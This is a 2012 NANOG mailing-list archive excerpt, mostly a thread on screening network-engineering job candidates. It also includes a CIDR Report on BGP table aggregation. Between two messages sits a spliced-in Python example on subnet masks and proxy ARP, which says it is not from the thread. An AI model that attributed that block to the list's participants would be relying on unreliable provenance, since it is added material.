If people don't bother to clean up the resume, either they don't understand what's relevant now, or they don't care, or they're trying to hide something.

--
-george william herbert
george.herbert at gmail.com

From egon at egon.cc Fri Jul 6 19:45:28 2012
From: egon at egon.cc (James Downs)
Date: Fri, 6 Jul 2012 17:45:28 -0700
Subject: FYI Netflix is down
In-Reply-To: <1C7B96053DD7814496A0D1E71661B68302CF607C@SMF-ENTXM-001.sac.ragingwire.net>
References: <1C7B96053DD7814496A0D1E71661B68302CF607C@SMF-ENTXM-001.sac.ragingwire.net>
Message-ID: <0D616ED5-0DB4-4DD2-A52C-7573637AC693@egon.cc>

On Jul 6, 2012, at 1:50 PM, Dan Golding wrote:

> This happens all the time. Not saying Netflix is doing this, but lots of other folks are. It's a trap that's easy to fall into. Especially with

Netflix did the reverse. They moved *to* Amazon, so they could do "noops".

From ben at meh.net.nz Fri Jul 6 19:51:55 2012
From: ben at meh.net.nz (Ben Aitchison)
Date: Sat, 7 Jul 2012 12:51:55 +1200
Subject: job screening question
In-Reply-To: <20120706061821.GU2221@hezmatt.org>
References: <20120705170139.EEEE1B26@resin13.mta.everyone.net> <20120706061821.GU2221@hezmatt.org>
Message-ID: <20120707005155.GA14111@meh.net.nz>

On Fri, Jul 06, 2012 at 04:18:21PM +1000, Matthew Palmer wrote:
> On Thu, Jul 05, 2012 at 05:01:39PM -0700, Scott Weeks wrote:
> >
> >
> > --- jason at thebaughers.com wrote:
> > From: Jason Baugher
> >
> > Geez, I'd be happy to find someone with a good attitude, a solid work
> > ethic, and the desire and aptitude to learn. :)
> > ---------------------------------------
> >
> >
> > Yeah, that. But how do you get those folks through the HR
> > process to you, so you can decipher their skill/work ethic
> > level? What can the HR person ask to find out if someone
> > has these qualities? OSPF LSA type questions will not help.
>
> Don't get HR to do that sort of screening. They suck mightily at it. I
> lack any sort of HR department to get in the way, and I'm glad of it -- I
> don't see the value in having someone who doesn't know anything about the
> job get in the way of finding the right person for it.
> Sure, get 'em to do
> the scutwork of posting job ads, collating resumes, scheduling things and
> sending the "lolz no!" responses, but actually filtering? Nah, I'll do that
> bit thanks. If you have to have HR do a filter call, make it *really*
> simple, like "What does TCP stand for?" -- sadly, you'll still probably
> filter out half the applicants for a senior position...

I've noticed a strong correlation between people who don't know what acronyms stand for, and competence. People who don't know anything try and figure out what the acronym stands for - people who want to understand things see it as just a place holder.

Myself, I'm stumbling.. is TCP like GNU (GNU's Not Unix) and something like TCP Control Protocol. Or is it Transmission Control Protocol? Or is it something else altogether. Really at the end of the day - it doesn't matter.

Maybe it's more significant to ask what the difference between TCP and UDP is.

One thing people seem to like to bring up again and again is subnetting questions, which to me seem quite simple on the surface - but can get a little more complicated. Like when you have a /24 subnet routed to a customer, how many IP addresses can they use? 254? 253? To my thinking - if it's a routed subnet that means the gateway is on a different address, and it'd be prudent to still have the double broadcast addresses. It is also possible to utilise all 256 addresses.

I think where the most significant differences lie isn't in how people can answer verbal or written questions with simple problems but in how quickly people can diagnose complicated or confusing situations. Although often there are steps people can take to mitigate against such, things like a foreign DHCP server on the network. Someone stealing the gateway's IP address leading to intermittent connectivity, but still being able to ping the gateway, and other hosts on the network, just not outside the network some of the time. Routing loops, incorrect subnet masks (like when people stick a /24 netmask on a /27 then can't reach another adjacent /27).

I think that anyone reasonably competent should be able to figure these things out - but by seeing how they approach these things, how quickly they can diagnose, and fix, and what level of disruption they cause trying to fix the problem are all significant. Like in the someone stealing gateway address case - say there's a file server, printer etc on the local subnet, and people are busy working, then it's probably better not being able to access the larger network, and to keep the local connectivity, but some people seem to have the idea when things aren't working quite right that it's ok to disrupt what is working right.

Ben.

From snoble at sonn.com Fri Jul 6 20:22:37 2012
From: snoble at sonn.com (Steven Noble)
Date: Fri, 6 Jul 2012 18:22:37 -0700
Subject: job screening question
In-Reply-To:
References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> <40593.1341587570@turing-police.cc.vt.edu> <4FF70945.4050507@foobar.org> <25808.1341613518@turing-police.cc.vt.edu> <4FF76FCD.6070405@foobar.org>
Message-ID:

On Jul 6, 2012, at 5:04 PM, George Herbert wrote:

> On Fri, Jul 6, 2012 at 4:43 PM, Steven Noble wrote:
>> On Jul 6, 2012, at 4:16 PM, George Herbert wrote:
>>
>>> 6) Puffed it up a little (worked with Cisco routers, but in the 7200
>>> era, and hasn't categorized skills as recent / older), but hasn't
>>> outright lied.
>>
>> The 7200 is still a heavily used platform today. It has no correlation with current skill sets IMHO.
>
> Would s/7200/2500/g be an adequate correction?
>
> I know of customers who still have 7200s as well, but in the context
> of ISP network engineering... Perhaps I'm wrong, but my impression is
> people on this list have generally moved on by now.
>
> Context matters. One can always point to lingering examples of older
> technology (if nowhere else, the Computer History Museum 8-). The
> question is whether the skill is relevant in context.
>
> I built a nationwide T-1 backbone out of Livingston IRXes once (in the
> early 90s) - the IRX left my resume by the late 1990s. I know of at
> least one still humming away in a closet, but it's not a relevant
> technology. I also learned (some) shell commands on a Vax 11/750 when
> they were new and used Apple II's when they were new, and so on. None
> of these are resume-appropriate now, unless I want a job at the
> Computer History

Hi George,

I sent the message too soon :(

I meant to say more about how the equipment is not as important as the drive and willingness to work with what you have.

I have talked to companies who have job openings many months old for people who absolutely exist in the silicon valley. The hiring company just thinks the people who apply are over or under qualified.

All of the great coders, engineers, etc started somewhere. The main thing that separates them from the posers and acronym namers is the willingness to grow, learn and dig in.

I like people who run 2500s in their house, or dd-wrt. It shows they are willing to try something and learn.

From jared at puck.nether.net Fri Jul 6 20:24:40 2012
From: jared at puck.nether.net (Jared Mauch)
Date: Fri, 6 Jul 2012 21:24:40 -0400
Subject: job screening question
In-Reply-To: <20120707005155.GA14111@meh.net.nz>
References: <20120705170139.EEEE1B26@resin13.mta.everyone.net> <20120706061821.GU2221@hezmatt.org> <20120707005155.GA14111@meh.net.nz>
Message-ID:

Die proxy arp die. (and that's not German).

I've had a job or consulting gig or two that has inadvertently had this as the hidden glue making things work. (wha, you can't route that subnet out an Ethernet interface without a next hop? It's always worked....)

I fight with sysadmins to this day about the concept of a broadcast domain and subnet... If I hear another case of someone saying that switch is the "80" subnet when there are 3 co-existing /24s in that domain I may go crazy....

I've cleaned up a lot of poor host and network management and it's amazing how much a difference the hardware operates without the hacks.

Jared Mauch

On Jul 6, 2012, at 8:51 PM, Ben Aitchison wrote:

> Routing loops, incorrect
> subnet masks. (like when people stick a /24 netmask on a /27 then can't reach another
> adjacent /27)

From valdis.kletnieks at vt.edu Fri Jul 6 20:32:04 2012
From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu)
Date: Fri, 06 Jul 2012 21:32:04 -0400
Subject: job screening question
In-Reply-To: Your message of "Fri, 06 Jul 2012 17:04:16 -0700."
References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> <40593.1341587570@turing-police.cc.vt.edu> <4FF70945.4050507@foobar.org> <25808.1341613518@turing-police.cc.vt.edu> <4FF76FCD.6070405@foobar.org>
Message-ID: <35910.1341624724@turing-police.cc.vt.edu>

On Fri, 06 Jul 2012 17:04:16 -0700, George Herbert said:
> If people don't bother to clean up the resume, either they don't
> understand what's relevant now, or they don't care, or they're trying
> to hide something.

OK. I admit it. My resume still lists that I spent a few years hacking assembler code for OS/VS1 and HASP 30 years ago. But it's there as one endpoint, that wanders from there, to IBM's VM, to SunOS, and Sendmail, some AIX and 8 or 9 other Unix flavors (anybody else remember UTX/32? If so, we need to share a few beers and swap stories:), computer security, to supporting SGI virtual reality systems in the late 90s (IR2 graphics pipes, woo-hoo), to Linux (my code is in every Android phone out there. OK, only a few dozen lines, but still ;), helped build a top-5 supercomputer and a few other things along the way, and now I mostly do high-performance storage infrastructure. Oh, and a paper in the IEEE Transactions on Nuclear Science along the line. ;)

So no. OS/VS1 isn't relevant now.
What *is* relevant now is that I have 3 decades of experience at being tossed new stuff by the boss and getting up to speed on it fast. The day my boss walks into my office and says "We've got this new..." and I'm unable to get up to speed on it faster than anybody else in the shop is the day it's time for me to retire. ;)

So the OS/VS1 reference stays. ;)

From ben at meh.net.nz Fri Jul 6 20:33:54 2012
From: ben at meh.net.nz (Ben Aitchison)
Date: Sat, 7 Jul 2012 13:33:54 +1200
Subject: job screening question
In-Reply-To:
References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org>
Message-ID: <20120707013354.GB14111@meh.net.nz>

On Fri, Jul 06, 2012 at 09:19:48AM -0500, Matt Chung wrote:
> A former manager of mine once told me you can gauge a person's understanding
> by the questions they ask and I personally agree with this statement. Most
> of us will be able to make a reasonable assessment of the person by
> listening to the content of their questions. I'm not looking for an
> immediate resolution, but trying to understand the thought process of the
> individual. I feel realistic scenarios provide some insight on the
> individual's analytical skills.
>
> "A client cannot access the website "http://xyz.com". What do you do to
> troubleshoot this issue?"

it's blocking icmp echo.. dns works.. with multiple regional dns servers.. the page loads for me.. has a modern tcp/ip stack, probably linux judging by an initial window size of 14600 .. hosted on amazon web services... I'd imagine that they're unlikely to be blocking icmp totally.. and just the echo.. but there's still that possibility... (yeah I know it's just an example)

> Depending on the candidate, I've seen a variety of answers:
> 1) "Can you ping the device?"
> 2) "Can you access the gateway?"
> 3) "What does the running config look like on the router"
> 4) "Is there a firewall in between"

heh,.. think i've been on the internet too long. i think from the destination site not working and what could be wrong with it.. then work my way back to the client. of course i completely skipped in my thinking that maybe other sites don't work too, and that there could be malware... and i didn't actually try going to the site with anything other than curl...

i suppose a big part of that particular problem is figuring out if it's at their end - a greater problem - or an actual problem getting to the site.

> I believe these questions may be asked in the right context provided there
> is enough information to isolate the issue to the network however the
> statement is devoid of anything useful that would make the network suspect.
> I would like to hear some questions such as:
>
> "are other websites accessible? Or is the only website the client is
> experiencing issues with?"
> "was the website working previously? when did it start happening?"
> "what does the client see on their screen ? are they getting an error?"

yeah that's a good idea :) my order is probably assuming there may be a more complicated issue, when it could be a simple problem, which actually seems to be quite common from what i've experienced with technical people. oh! the network cable was unplugged!

> These questions reflect the person's ability to accurately understand the
> problem before deep diving into the technical details. From there, you can
> get more technical. "Client is receiving an HTTP 404 error." Great, rule
> out network since this is an application layer response...

Some of those type problems have got a lot more complicated. Like - that could be a transparent proxy caching an HTTP 404... or the web site could be hosted in multiple locations and not syncing between them properly, which could still require some level of debugging.. or someone somehow managed to advertise the host's subnet with a more preferred route, then doesn't have the content.

Or say someone's decided to do something fancy like give different IP's back from DNS but giving internal IP addresses back to the local farm.. but they've decided to use Amazon DNS servers.. and set them to give IP .. but the customer happens to be using Amazon DNS servers because they're hosting a web site on Amazon, and for some reason thought it'd be a good idea.. and then the internal IP address of course doesn't have the content.

I suppose that's still application level to some points of view. It doesn't make the site magically work though, or figure out what's causing it.

Also from my experience, I don't tend to find out one website's not working unless it is working on/off or for other people, and the most common situation seems to be some kind of load balancing with one mirror not working, and I find it helpful to check from a few locations. And sometimes doing dns lookups, on multiple DNS servers, and seeing a different IP and using curl -x :80 seems to be the easiest way to check this.

But that's assuming a transparent proxied network, which tends to mean MTU issues show up as instead "banking web sites aren't working". Which can show up sometimes when people change routers to one not doing MSS-clamping, and operate at 1492 MTU... The issue is significant enough, and the problem hard enough for helpdesk type people to diagnose that it's common for MSS clamping to be set at a network level for networks with a significant amount of people with < 1500 MTU.

Ben.
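The subnet-mask point from Ben Aitchison's earlier post in this thread (a host with a /24 netmask sitting in a /27, and the 254/253/256 answers for a routed /24), worked through as an added example. This is not code from any message in the thread; it uses only the Python standard library, the TEST-NET-1 documentation range 192.0.2.0/24, and a constructed list of which addresses actually answer ARP on the customer's segment. The function names and the scenario are assumptions made for the illustration.

```python
import ipaddress

# Constructed scenario (TEST-NET-1 documentation space, not a real deployment):
# a customer holds 192.0.2.0/27 with the provider's router at 192.0.2.1, and
# the adjacent 192.0.2.32/27 belongs to a different customer behind that router.
GATEWAY = "192.0.2.1"
# Addresses that really answer ARP on the customer's segment (constructed).
ON_LINK = frozenset({"192.0.2.1", "192.0.2.10", "192.0.2.11", "192.0.2.20"})
NEIGHBOUR_HOST = "192.0.2.40"   # lives in the adjacent /27, reachable only via the router


def usable_hosts(network: str, gateway_inside: bool = True,
                 reserve_network_and_broadcast: bool = True) -> int:
    """Count the addresses a customer can assign in a routed block.

    For a /24 the three answers from the thread fall out of the two flags:
    253 (network and broadcast reserved, gateway inside the block),
    254 (gateway lives outside the block, e.g. on a separate link net) and
    256 (nothing reserved, which only works if router and hosts all agree).
    """
    net = ipaddress.ip_network(network, strict=False)
    count = net.num_addresses
    if reserve_network_and_broadcast and net.prefixlen < 31:  # /31, /32: nothing to reserve
        count -= 2
    if gateway_inside:
        count -= 1
    return count


def next_hop(host: str, dest: str, gateway: str = GATEWAY) -> str:
    """The host's own on-link test, driven purely by its configured mask:
    a destination inside the configured subnet is ARPed for directly,
    anything else is handed to the default gateway."""
    iface = ipaddress.ip_interface(host)            # e.g. "192.0.2.10/27"
    if ipaddress.ip_address(dest) in iface.network:
        return "direct"
    return gateway


def reachability(host: str, dest: str, proxy_arp: bool = False,
                 on_link: frozenset = ON_LINK) -> str:
    """Classify what happens to a packet from `host` to `dest`.

    'gateway'   the host forwards to the router, which routes it on
    'direct'    the host ARPs and the target itself answers
    'blackhole' the host ARPs for an address nobody on the wire owns
    'proxy-arp' same, but the router answers on the target's behalf
                (the hidden glue Jared Mauch objects to earlier in the thread)
    """
    if next_hop(host, dest) != "direct":
        return "gateway"
    if dest in on_link:
        return "direct"
    return "proxy-arp" if proxy_arp else "blackhole"


if __name__ == "__main__":
    # Correct /27 mask: the adjacent /27 goes via the router. Wrong /24 mask:
    # the host thinks .40 is on its own wire, ARPs for it, and gets no answer.
    for host in ("192.0.2.10/27", "192.0.2.10/24"):
        print(f"{host} -> {NEIGHBOUR_HOST}: {reachability(host, NEIGHBOUR_HOST)}")
    print("routed /24, gateway outside:", usable_hosts("192.0.2.0/24", gateway_inside=False))
    print("routed /24, gateway inside: ", usable_hosts("192.0.2.0/24"))
    print("routed /24, nothing reserved:",
          usable_hosts("192.0.2.0/24", gateway_inside=False,
                       reserve_network_and_broadcast=False))
```

The interesting line is the misconfigured one: with a /24 mask the host never sends the packet to the router at all, so the "can't reach the adjacent /27" symptom is silent ARP failure rather than a routing problem, and it only appears to work on networks where the router is proxy-ARPing, which is exactly the dependency Jared's message complains about.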
From bill at herrin.us Fri Jul 6 20:36:47 2012
From: bill at herrin.us (William Herrin)
Date: Fri, 6 Jul 2012 21:36:47 -0400
Subject: job screening question
In-Reply-To:
References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> <40593.1341587570@turing-police.cc.vt.edu> <4FF70945.4050507@foobar.org> <25808.1341613518@turing-police.cc.vt.edu> <4FF76FCD.6070405@foobar.org>
Message-ID:

On Fri, Jul 6, 2012 at 9:22 PM, Steven Noble wrote:
> I have talked to companies who have job openings many
> months old for people who absolutely exist in the silicon
> valley. The hiring company just thinks the people who
> apply are over or under qualified.

I thought someone was overqualified once. My decision was overridden. I turned out to be very glad it was. He didn't fit the role I thought I needed but I was able to turn him loose with minimal supervision. And I was able to go on vacation. :) That was so much more valuable.

Now I know: tell the candidate about the work, all the work not just the job you thought you would hire for, and let him tell you whether any of it is beneath him. As long as you get all the skills you need on the team you can juggle the tasking.

Regards,
Bill Herrin

--
William D. Herrin ................ herrin at dirtside.com  bill at herrin.us
3005 Crane Dr. ...................... Web:
Falls Church, VA 22042-3004

From bill at herrin.us Fri Jul 6 20:45:15 2012
From: bill at herrin.us (William Herrin)
Date: Fri, 6 Jul 2012 21:45:15 -0400
Subject: job screening question
In-Reply-To: <20120707005155.GA14111@meh.net.nz>
References: <20120705170139.EEEE1B26@resin13.mta.everyone.net> <20120706061821.GU2221@hezmatt.org> <20120707005155.GA14111@meh.net.nz>
Message-ID:

On Fri, Jul 6, 2012 at 8:51 PM, Ben Aitchison wrote:
> Like when you have a /24 subnet routed to a customer, how many IP
> addresses can they use? 254? 253? To my thinking - if it's a routed subnet that
> means the gateway is on a different address, and it'd be prudent to still have the
> double broadcast addresses. It is also possible to utilise all 256 addresses.

There can be hidden downsides to trying that. I tried to use all 17 addresses from my Cox Business Internet /28 (the 16 in the /28 and the "router's" external address). Rigged it as a /24 inside and used proxy arp to move the outside addresses back out including the fake .1 default gateway that the router offered arp for but didn't hold.

Only the first 16 of the 17 addresses worked. Which 16? Why, the first 16 the cable modem saw a packet from after power-on. Made for some interesting debugging.

Regards,
Bill Herrin

--
William D. Herrin ................ herrin at dirtside.com  bill at herrin.us
3005 Crane Dr. ...................... Web:
Falls Church, VA 22042-3004

From dougb at dougbarton.us Fri Jul 6 21:09:54 2012
From: dougb at dougbarton.us (Doug Barton)
Date: Fri, 06 Jul 2012 19:09:54 -0700
Subject: job screening question
In-Reply-To:
References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> <40593.1341587570@turing-police.cc.vt.edu> <4FF70945.4050507@foobar.org> <25808.1341613518@turing-police.cc.vt.edu> <4FF76FCD.6070405@foobar.org>
Message-ID: <4FF79A72.5030707@dougbarton.us>

On 07/06/2012 16:16, George Herbert wrote:
> On Fri, Jul 6, 2012 at 4:07 PM, Nick Hilliard wrote:
>> On 06/07/2012 23:25, valdis.kletnieks at vt.edu wrote:
>>> The Friday afternoon cynic in me says it's because it's a move with positive
>>> paybacks. There's 3 basic possibilities:
>>>
>>> 1) You send the puffed resume to a company with clue, it gets recognized
>>> as puffed, and you don't get the job. Zero loss, you weren't going to get
>>> that job anyhow.
>>>
>>> 2) You send a boring unpuffed resume to a company sans clue. They recognize it
>>> as boring because there's only 3 buzzwords on 2 pages, and you don't get the
>>> job. Loss.
>>>
>>> 3) You send a puffed resume, and the guy doing the hiring doesn't know what
>>> the 3-packet mating call of the Internet is *either*. Win.
>>
>> or:
>>
>> 4) you get caught out in the interview as being puffed up, but the company
>> hires you anyway despite strongly worded objections from the interviewer,
>> causing the interviewer's eyes to spin in their sockets at the inanity of
>> the decision. You then spend your entire employment at the company proving
>> your ineptitude beyond all possible doubt.
>>
>> I think this is a win, is it?
>
> There's also
>
> 5) Didn't have enough clue about the real world to know you were
> puffing your resume up.
>
> 6) Puffed it up a little (worked with Cisco routers, but in the 7200
> era, and hasn't categorized skills as recent / older), but hasn't
> outright lied.

7) Were the beneficiary of some professional resume service/headhunter. "You know how to spell 'aych-tee-tee-pee'? Let's list that!"

--
If you're never wrong, you're not trying hard enough

From cidr-report at potaroo.net Fri Jul 6 17:00:00 2012
From: cidr-report at potaroo.net (cidr-report at potaroo.net)
Date: Fri, 6 Jul 2012 22:00:00 GMT
Subject: The Cidr Report
Message-ID: <201207062200.q66M00cC029187@wattle.apnic.net>

This report has been generated at Fri Jul 6 21:12:59 2012 AEST.
The report analyses the BGP Routing Table of AS2.0 router
and generates a report on aggregation potential within the table.

Check http://www.cidr-report.org for a current version of this report.

Recent Table History
        Date      Prefixes    CIDR Agg
        29-06-12    417364      242261
        30-06-12    417376      242216
        01-07-12    417290      242354
        02-07-12    417365      242609
        03-07-12    417797      242417
        04-07-12    418052      242290
        05-07-12    417636      242405
        06-07-12    418603      242676

AS Summary
         41592  Number of ASes in routing system
         17374  Number of ASes announcing only one prefix
          3392  Largest number of prefixes announced by an AS
                AS6389 : BELLSOUTH-NET-BLK - BellSouth.net Inc.
     113090528  Largest address span announced by an AS (/32s)
                AS4134 : CHINANET-BACKBONE No.31,Jin-rong Street

Aggregation Summary
The algorithm used in this report proposes aggregation only
when there is a precise match using the AS path, so as
to preserve traffic transit policies. Aggregation is also
proposed across non-advertised address space ('holes').

 --- 06Jul12 ---
ASnum    NetsNow NetsAggr  NetGain   % Gain   Description

Table     418725   242599   176126    42.1%   All ASes

AS6389      3392      191     3201    94.4%   BELLSOUTH-NET-BLK - BellSouth.net Inc.
AS7029      3281     1631     1650    50.3%   WINDSTREAM - Windstream Communications Inc
AS22773     1656      136     1520    91.8%   ASN-CXA-ALL-CCI-22773-RDC - Cox Communications Inc.
AS4766      2694     1240     1454    54.0%   KIXS-AS-KR Korea Telecom
AS17974     2146      762     1384    64.5%   TELKOMNET-AS2-AP PT Telekomunikasi Indonesia
AS18566     2088      706     1382    66.2%   COVAD - Covad Communications Co.
AS28573     1989      621     1368    68.8%   NET Servicos de Comunicao S.A.
AS2118      1288       15     1273    98.8%   RELCOM-AS OOO "NPO Relcom"
AS4323      1576      386     1190    75.5%   TWTC - tw telecom holdings, inc.
AS1785      1932      813     1119    57.9%   AS-PAETEC-NET - PaeTec Communications, Inc.
AS10620     1983      884     1099    55.4%   Telmex Colombia S.A.
AS4755      1612      561     1051    65.2%   TATACOMM-AS TATA Communications formerly VSNL is Leading ISP
AS7303      1453      458      995    68.5%   Telecom Argentina S.A.
AS7552      1124      234      890    79.2%   VIETEL-AS-AP Vietel Corporation
AS8151      1498      686      812    54.2%   Uninet S.A. de C.V.
AS18101      946      160      786    83.1%   RELIANCE-COMMUNICATIONS-IN Reliance Communications Ltd.DAKC MUMBAI
AS17908      827       60      767    92.7%   TCISL Tata Communications
AS4808      1100      352      748    68.0%   CHINA169-BJ CNCGROUP IP network China169 Beijing Province Network
AS9394       887      162      725    81.7%   CRNET CHINA RAILWAY Internet(CRNET)
AS13977      839      123      716    85.3%   CTELCO - FAIRPOINT COMMUNICATIONS, INC.
AS3356      1105      462      643    58.2%   LEVEL3 Level 3 Communications
AS855        694       57      637    91.8%   CANET-ASN-4 - Bell Aliant Regional Communications, Inc.
AS17676      692       75      617    89.2%   GIGAINFRA Softbank BB Corp.
AS4780       841      245      596    70.9%   SEEDNET Digital United Inc.
AS22561     1023      428      595    58.2%   DIGITAL-TELEPORT - Digital Teleport Inc.
AS19262      998      405      593    59.4%   VZGNI-TRANSIT - Verizon Online LLC
AS24560     1036      448      588    56.8%   AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services
AS8452      1222      665      557    45.6%   TE-AS TE-AS
AS3549       991      436      555    56.0%   GBLX Global Crossing Ltd.
AS4804       649       97      552    85.1%   MPX-AS Microplex PTY LTD

Total      43562    13499    30063    69.0%   Top 30 total

Possible Bogus Routes

        10.86.64.32/30       AS65530 -Private Use AS-
        10.86.64.36/30       AS65530 -Private Use AS-
        10.86.65.32/30       AS65530 -Private Use AS-
        10.86.65.36/30       AS65530 -Private Use AS-
        10.255.255.0/30      AS65530 -Private Use AS-
        10.255.255.4/30      AS65530 -Private Use AS-
        10.255.255.8/30      AS65530 -Private Use AS-
        14.192.0.0/22        AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg
        14.192.4.0/22        AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg
        14.192.8.0/22        AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg
        14.192.12.0/22       AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg
        14.192.16.0/22       AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg
        14.192.20.0/22       AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg
        14.192.24.0/22       AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg
        14.192.28.0/22       AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg
        27.112.114.0/24      AS23884 PROENNET-AS Proimage Engineering and Communication Co.,Ltd.
        62.61.220.0/24       AS24974 TACHYON-EU Tachyon Europe BV
        62.61.221.0/24       AS24974 TACHYON-EU Tachyon Europe BV
        64.66.32.0/20        AS18864
        66.171.32.0/20       AS705   UUNET - MCI Communications Services, Inc. d/b/a Verizon Business
        66.180.239.0/24      AS35888 VIGNETTE - VIGNETTE CORPORATION
        66.207.32.0/20       AS23011
        66.245.176.0/20      AS19318 NJIIX-AS-1 - NEW JERSEY INTERNATIONAL INTERNET EXCHANGE LLC
        66.251.128.0/24      AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks
        66.251.133.0/24      AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks
        66.251.134.0/24      AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks
        66.251.136.0/21      AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks
        66.251.140.0/24      AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks
        66.251.141.0/24      AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks
        66.251.142.0/24      AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks
        66.251.143.0/24      AS3356  LEVEL3 Level 3 Communications
        69.46.224.0/20       AS32592 HUNT-BROTHERS-OF-LOUISIANA-LLC - Hunt Brothers
        69.46.233.0/24       AS32592 HUNT-BROTHERS-OF-LOUISIANA-LLC - Hunt Brothers
        69.46.236.0/24       AS32592 HUNT-BROTHERS-OF-LOUISIANA-LLC - Hunt Brothers
        70.34.112.0/20       AS27589 MOJOHOST - MOJOHOST
        71.19.134.0/23       AS3313  INET-AS BT Italia S.p.A.
        72.35.224.0/22       AS30097 NUWAVE - NuWave
        72.35.229.0/24       AS30188 TELEVERGENCE - Televergence Solutions Inc.
        72.35.232.0/21       AS30097 NUWAVE - NuWave
        72.44.16.0/20        AS15054 HAMELTRONICS - Hameltronics, LLC
        74.91.48.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.49.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.50.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.51.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.52.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.53.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.54.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.55.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.56.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.57.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.58.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.59.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.60.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.61.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.62.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.91.63.0/24        AS30137 SEA-BROADBAND - Sea Broadband, LLC
        74.115.124.0/23      AS46540
        74.115.126.0/24      AS11260 EASTLINK-HSI - EastLink
        81.22.64.0/20        AS5511  OPENTRANSIT France Telecom S.A.
        82.101.160.0/19      AS5511  OPENTRANSIT France Telecom S.A.
        110.34.44.0/22       AS12653 COMTONET KB Impuls Hellas S.A.
        116.206.72.0/24      AS6461  MFNX MFN - Metromedia Fiber Network
        116.206.85.0/24      AS6461  MFNX MFN - Metromedia Fiber Network
        116.206.103.0/24     AS6461  MFNX MFN - Metromedia Fiber Network
        117.120.56.0/21      AS4755  TATACOMM-AS TATA Communications formerly VSNL is Leading ISP
        120.136.17.0/24      AS38779 BMG-AS-ID Badan Meteorologi dan Geofisika
        121.46.0.0/16        AS4134  CHINANET-BACKBONE No.31,Jin-rong Street
        142.54.0.0/19        AS23498 CDSI - Cogeco Data Services LP
        172.14.0.0/24        AS57871 ASTELECENTR TeleCentr Ltd.
        172.15.0.0/24        AS57871 ASTELECENTR TeleCentr Ltd.
        172.45.1.0/24        AS3356  LEVEL3 Level 3 Communications
        172.102.0.0/22       AS4812  CHINANET-SH-AP China Telecom (Group)
        172.116.0.0/24       AS7018  ATT-INTERNET4 - AT&T Services, Inc.
        198.18.0.0/15        AS14744 INTERNAP-BLOCK-4 - Internap Network Services Corporation
        198.51.100.0/24      AS14744 INTERNAP-BLOCK-4 - Internap Network Services Corporation
        200.1.112.0/24       AS29754 GO2TEL GO2TEL.COM INC.
        200.6.49.0/24        AS23148 TERREMARK Terremark
        200.24.73.0/24       AS26061 Equant Colombia
        200.33.40.0/24       AS11172 Alestra, S. de R.L. de C.V.
        200.34.0.0/20        AS6342  Instituto Tecnológico y de Estudios Superiores de Monterrey
        200.53.0.0/19        AS13878 Diveo do Brasil Telecomunicacoes Ltda
        200.58.248.0/21      AS27849
        200.75.184.0/21      AS14754 Telgua
        200.106.128.0/20     AS3257  TINET-BACKBONE Tinet SpA
        200.115.112.0/20     AS3257  TINET-BACKBONE Tinet SpA
        202.1.224.0/24       AS10097 FLOWCOM Flow Communications 2/541 Kent St Sydney NSW 2000
        202.8.106.0/24       AS9530  SHINSEGAE-AS SHINSEGAE I&C Co., Ltd.
        202.58.113.0/24      AS19161
        202.83.120.0/21      AS37972
        202.83.124.0/24      AS37972
        202.83.125.0/24      AS37972
        202.83.126.0/24      AS37972
        202.94.1.0/24        AS4808  CHINA169-BJ CNCGROUP IP network China169 Beijing Province Network
        202.140.128.0/19     AS9583  SIFY-AS-IN Sify Limited
        202.174.125.0/24     AS9498  BBIL-AP BHARTI Airtel Ltd.
        202.176.1.0/24       AS9942  COMINDICO-AP SOUL Converged Communications Australia
        202.179.134.0/24     AS23966 LDN-AS-PK LINKdotNET Telecom Limited
        203.0.113.0/24       AS14744 INTERNAP-BLOCK-4 - Internap Network Services Corporation
        203.23.1.0/24        AS18111 NETSPEED-AS-AP Netspeed Internet Communications
        203.24.38.0/24       AS18111 NETSPEED-AS-AP Netspeed Internet Communications
        203.30.127.0/24      AS18111 NETSPEED-AS-AP Netspeed Internet Communications
        203.32.86.0/23       AS18111 NETSPEED-AS-AP Netspeed Internet Communications
        203.32.86.0/24       AS18111 NETSPEED-AS-AP Netspeed Internet Communications
        203.32.87.0/24       AS18111 NETSPEED-AS-AP Netspeed Internet Communications
        203.32.188.0/24      AS1221  ASN-TELSTRA Telstra Pty Ltd
        203.142.219.0/24     AS45149
